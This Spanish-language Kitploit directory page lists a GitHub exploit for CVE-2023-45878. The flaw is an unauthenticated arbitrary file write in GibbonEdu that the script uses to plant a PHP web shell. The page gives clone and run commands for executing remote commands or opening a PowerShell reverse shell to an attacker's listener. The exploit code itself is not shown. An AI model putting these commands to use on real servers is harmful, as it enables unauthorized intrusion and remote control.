Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-45878 — GibbonEdu Escritura Arbitraria de Archivos a Ejecución Remota de Código | Kitploit
Herramientas/GitHubGitHub/davidzzo23/cve-2023-45878
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubdavidzzo23/cve-2023-45878

CVE-2023-45878

GibbonEdu Escritura Arbitraria de Archivos a Ejecución Remota de Código

Ver Repositorio
32hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-45878

GibbonEdu: Escritura arbitraria de archivos para ejecución de una web shell

Descripción

Este repositorio contiene un exploit para CVE-2023-45878, una vulnerabilidad de escritura arbitraria de archivos en GibbonEdu. La vulnerabilidad afecta al endpoint rubrics_visualise_saveAjax.php y permite a un atacante no autenticado subir archivos arbitrarios al servidor web.

Este script aprovecha la vulnerabilidad para subir una web shell PHP y, o bien:

  • Ejecutar un comando de sistema específico;
  • Activar una reverse shell de PowerShell codificada en base64 para obtener acceso remoto.

Uso

El script admite dos modos de funcionamiento:

  • --command (-c): Ejecutar un comando de sistema específico de forma remota.
  • --shell (-s): Activar una reverse shell de PowerShell hacia el listener del atacante.

Cómo ejecutar el exploit

1. Clonar el repositorio

root@kitploit:~
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878

2. Ejecutar el exploit de la web shell

  • Ejecutar un comando remoto:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
  • Activar una reverse shell de PowerShell:
root@kitploit:~
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>

Descargo de responsabilidad

Este script tiene fines exclusivamente educativos. El uso no autorizado de este exploit en sistemas sin permiso es ilegal. El autor no se hace responsable de ningún uso indebido o daño causado por este exploit.

Descargar herramienta